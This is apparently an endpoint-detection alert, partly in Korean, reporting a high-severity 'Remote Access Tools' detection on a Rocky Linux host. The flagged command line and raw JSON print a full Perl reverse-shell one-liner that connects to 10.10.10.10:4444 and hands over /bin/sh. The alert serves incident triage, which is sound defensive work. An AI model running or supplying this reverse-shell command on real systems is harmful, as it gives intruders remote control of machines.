Alert Information High
Alert ID
ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234825515698864-30103-7691024
Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234825515698864-30103-7691024
설명
Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.
호스트
localhost.localdomain
상태
new
생성 시간
2025-12-20 21:48:08
업데이트 시간
2025-12-20 22:47:07
MITRE ATT&CK
Tactic
Command and Control
Technique
Remote Access Tools
Command Line 
bash -c perl -e "use Socket;\$i=\"10.10.10.10\";\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}"
Raw JSON Data 
{"id":"ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234825515698864-30103-7691024","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234825515698864-30103-7691024","agent_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Remote Access Tools","technique_id":"T1219","cmdline":"bash -c perl -e \u0022use Socket;\\$i=\\\u002210.10.10.10\\\u0022;\\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\u0022tcp\\\u0022));if(connect(S,sockaddr_in(\\$p,inet_aton(\\$i)))){open(STDIN,\\\u0022\u003E\u0026S\\\u0022);open(STDOUT,\\\u0022\u003E\u0026S\\\u0022);open(STDERR,\\\u0022\u003E\u0026S\\\u0022);exec(\\\u0022/bin/sh -i\\\u0022);}\u0022","filename":"bash","filepath":"/usr/bin/bash","sha256":"ec6d007d48ef11bc47ad3f372b4b20ff2f0d4e63867e7e4cc0f1b17b19fa88b2","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:48:08.000783845Z","updated_timestamp":"2025-12-20T13:47:07.996542266Z","device":{"device_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"localhost.localdomain","local_ip":"10.24.11.62","external_ip":"211.198.135.5","mac_address":"00-0c-29-89-f8-0a","platform_name":"Linux","os_version":"Rocky Linux 9.6"},"aggregate_id":"aggind:b4aeee57c4b841bc95cb853f0aca95e1:4817351821","CreatedAt":"2025-12-20T21:48:08.0007838+09:00","UpdatedAt":"2025-12-20T22:47:07.9965423+09:00"}
Quick Info
  • Severity High
  • Score 70
  • Agent ID b4aeee57c4b841bc95cb853f0aca95e1
Actions
Falcon Console에서 보기 목록으로 돌아가기